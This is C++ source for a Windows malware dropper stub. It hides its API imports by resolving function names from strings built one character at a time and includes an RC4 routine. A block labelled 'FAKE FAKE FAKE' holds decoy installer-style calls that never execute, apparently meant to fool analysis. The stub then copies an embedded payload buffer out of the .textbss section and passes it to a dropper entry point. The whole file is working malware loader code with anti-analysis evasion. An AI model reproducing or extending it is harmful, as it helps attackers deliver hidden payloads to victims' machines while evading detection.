vector-default/default.cpp
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include "DropperCode.h"
#include "DropperHeader.h"
#pragma comment(linker, "/SUBSYSTEM:WINDOWS")
#pragma section(".textbss",read)
__declspec(allocate(".textbss"))
static ULONG pCooked[(1024*1024)/sizeof(ULONG)] = {0xdeadbeef};
GETMODULEHANDLE pfn_GetModuleHandle;
LOADLIBRARYA pfn_LoadLibraryA;
GETPROCADDRESS pfn_GetProcAddress;
VIRTUALALLOC pfn_VirtualAlloc;
VIRTUALFREE pfn_VirtualFree;
GETMODULEFILENAMEA pfn_GetModuleFileNameA;
GETENVIRONMENTVARIABLEA pfn_GetEnvironmentVariableA;
GETFILEATTRIBUTESA pfn_GetFileAttributesA;
CREATEDIRECTORYA pfn_CreateDirectoryA;
SETCURRENTDIRECTORYA pfn_SetCurrentDirectoryA;
SETFILEATTRIBUTESA pfn_SetFileAttributesA;
CREATEFILEA pfn_CreateFileA;
GETLASTERROR pfn_GetLastError;
WRITEFILE pfn_WriteFile;
CLOSEHANDLE pfn_CloseHandle;
FREELIBRARY pfn_FreeLibrary;
DELETEFILEA pfn_DeleteFileA;
SWPRINTF pfn_swprintf;
GETCURRENTPROCESSID pfn_GetCurrentProcessId;
VOID InitWinApi()
{
HMODULE hKernel32, hNtDll;
CHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', 0x0};
CHAR strNtDll[] = { 'n', 't', 'd', 'l', 'l', 0x0};
pfn_GetProcAddress = resolveGetProcAddress();
pfn_LoadLibraryA = resolveLoadLibrary();
hKernel32 = pfn_LoadLibraryA(strKernel32);
hNtDll = pfn_LoadLibraryA(strNtDll);
CHAR strVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0};
pfn_VirtualAlloc = (VIRTUALALLOC)pfn_GetProcAddress(hKernel32, strVirtualAlloc);
CHAR strVirtualFree[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'F', 'r', 'e', 'e', 0x0};
pfn_VirtualFree = (VIRTUALFREE)pfn_GetProcAddress(hKernel32, strVirtualFree);
CHAR strGetModuleFileNameA[] = { 'G', 'e', 't', 'M', 'o', 'd', 'u', 'l', 'e', 'F', 'i', 'l', 'e', 'N', 'a', 'm', 'e', 'A', 0x0};
pfn_GetModuleFileNameA = (GETMODULEFILENAMEA)pfn_GetProcAddress(hKernel32, strGetModuleFileNameA);
CHAR strGetEnvironmentVariableA[] = { 'G', 'e', 't', 'E', 'n', 'v', 'i', 'r', 'o', 'n', 'm', 'e', 'n', 't', 'V', 'a', 'r', 'i', 'a', 'b', 'l', 'e', 'A', 0x0};
pfn_GetEnvironmentVariableA = (GETENVIRONMENTVARIABLEA)pfn_GetProcAddress(hKernel32, strGetEnvironmentVariableA);
CHAR strGetFileAttributesA[] = { 'G', 'e', 't', 'F', 'i', 'l', 'e', 'A', 't', 't', 'r', 'i', 'b', 'u', 't', 'e', 's', 'A', 0x0};
pfn_GetFileAttributesA = (GETFILEATTRIBUTESA)pfn_GetProcAddress(hKernel32, strGetFileAttributesA);
CHAR strCreateDirectoryA[] = { 'C', 'r', 'e', 'a', 't', 'e', 'D', 'i', 'r', 'e', 'c', 't', 'o', 'r', 'y', 'A', 0x0};
pfn_CreateDirectoryA = (CREATEDIRECTORYA)pfn_GetProcAddress(hKernel32, strCreateDirectoryA);
CHAR strSetCurrentDirectoryA[] = { 'S', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'D', 'i', 'r', 'e', 'c', 't', 'o', 'r', 'y', 'A', 0x0};
pfn_SetCurrentDirectoryA = (SETCURRENTDIRECTORYA)pfn_GetProcAddress(hKernel32, strSetCurrentDirectoryA);
CHAR strSetFileAttributesA[] = { 'S', 'e', 't', 'F', 'i', 'l', 'e', 'A', 't', 't', 'r', 'i', 'b', 'u', 't', 'e', 's', 'A', 0x0};
pfn_SetFileAttributesA = (SETFILEATTRIBUTESA)pfn_GetProcAddress(hKernel32, strSetFileAttributesA);
CHAR strCreateFileA[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A', 0x0};
pfn_CreateFileA = (CREATEFILEA)pfn_GetProcAddress(hKernel32, strCreateFileA);
CHAR strGetLastError[] = { 'G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r', 0x0};
pfn_GetLastError = (GETLASTERROR)pfn_GetProcAddress(hKernel32, strGetLastError);
CHAR strWriteFile[] = { 'W', 'r', 'i', 't', 'e', 'F', 'i', 'l', 'e', 0x0};
pfn_WriteFile = (WRITEFILE)pfn_GetProcAddress(hKernel32, strWriteFile);
CHAR strCloseHandle[] = { 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0};
pfn_CloseHandle = (CLOSEHANDLE)pfn_GetProcAddress(hKernel32, strCloseHandle);
CHAR strFreeLibrary[] = { 'F', 'r', 'e', 'e', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 0x0 };
pfn_FreeLibrary = (FREELIBRARY)pfn_GetProcAddress(hKernel32, strFreeLibrary);
CHAR strDeleteFileA[] = { 'D', 'e', 'l', 'e', 't', 'e', 'F', 'i', 'l', 'e', 'A', 0x0 };
pfn_DeleteFileA = (DELETEFILEA)pfn_GetProcAddress(hKernel32, strDeleteFileA);
CHAR strSwprintf[] = { 's', 'w', 'p', 'r', 'i', 'n', 't', 'f', 0x0 };
pfn_swprintf = (SWPRINTF)pfn_GetProcAddress(hNtDll, strSwprintf);
CHAR strGetCurrentProcessId[] = { 'G', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 'I', 'd', 0x0 };
pfn_GetCurrentProcessId = (GETCURRENTPROCESSID)pfn_GetProcAddress(hKernel32, strGetCurrentProcessId);
CHAR strGetModuleHandle[] = { 'G', 'e', 't', 'M', 'o', 'd', 'u', 'l', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 'A', 0x0 };
pfn_GetModuleHandle = (GETMODULEHANDLE)pfn_GetProcAddress(hKernel32, strGetModuleHandle);
}
DropperHeader *GetEofData(LPVOID FileBuffer)
{
return (DropperHeader *)NULL;
}
void rc4_encrypt(
const unsigned char *key,
size_t keylen,
size_t skip,
unsigned char *data,
size_t data_len)
{
unsigned int i, j, k;
unsigned char *pos;
size_t kpos;
unsigned char *S = (unsigned char*) pfn_VirtualAlloc(NULL, 256, MEM_COMMIT, PAGE_READWRITE);
/* Setup RC4 state */
for (i = 0; i < 256; i++)
S[i] = i;
j = 0;
kpos = 0;
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[kpos]) & 0xff;
kpos++;
if (kpos >= keylen)
kpos = 0;
S_SWAP(i, j);
}
/* Skip the start of the stream */
i = j = 0;
for (k = 0; k < skip; k++) {
i = (i + 1) & 0xff;
j = (j + S[i]) & 0xff;
S_SWAP(i, j);
}
/* Apply RC4 to data */
pos = data;
for (k = 0; k < data_len; k++) {
i = (i + 1) & 0xff;
j = (j + S[i]) & 0xff;
S_SWAP(i, j);
*pos++ ^= S[(S[i] + S[j]) & 0xff];
}
pfn_VirtualFree(S, 0, MEM_RELEASE);
}
int CALLBACK WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitWinApi();
// FAKE FAKE FAKE
if (pfn_GetCurrentProcessId() == 4)
{
STARTUPINFO sInfo;
MessageBox(NULL, L"Launching installer", L"Installer", 0);
GetStartupInfo(&sInfo);
if (sInfo.dwFlags == 12)
{
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)GetDesktopWindow, NULL, 0, NULL);
RECT pRect;
if (GetClientRect(GetDesktopWindow(), &pRect))
MessageBox(NULL, L"Setting up window", L"Action succeded", 0);
}
ShowWindow(GetDesktopWindow(), SW_MAXIMIZE);
VirtualFree(VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), 0, MEM_RELEASE);
if (GetLastError() == 123)
MessageBox(NULL, L"Memory committed", L"Memory manager", 0);
ULONG uVersion;
LPWSTR pCmdLine = GetCommandLine();
if (pCmdLine[0] != L'c')
{
uVersion = GetVersion();
if (uVersion == 0x7812)
ExitProcess(123);
}
SYSTEM_INFO pSysInfo;
GetSystemInfo(&pSysInfo);
if (pSysInfo.dwOemId = 0x62814)
MessageBox(NULL, L"Uknown system detected", L"Compatibility check", 0);
DWORD pDummy;
if (RegQueryValueEx((HKEY)0x40, L"Start", &pDummy, 0, (LPBYTE)&pDummy, &pDummy) == ERROR_SUCCESS)
MessageBox(NULL, L"Program already installed", L"Installer", 0);
LCID pThreadLocale = GetThreadLocale();
if (pThreadLocale == 12)
MessageBox(NULL, L"Unsupported language", L"Error", 0);
}
// END FAKE FAKE FAKE
DropperHeader *pDropperHeader = (DropperHeader *)pfn_VirtualAlloc(NULL, sizeof(pCooked), MEM_COMMIT, PAGE_READWRITE);
_MEMCPY_(pDropperHeader, pCooked, sizeof(pCooked));
DropperEntryPoint(pDropperHeader);
}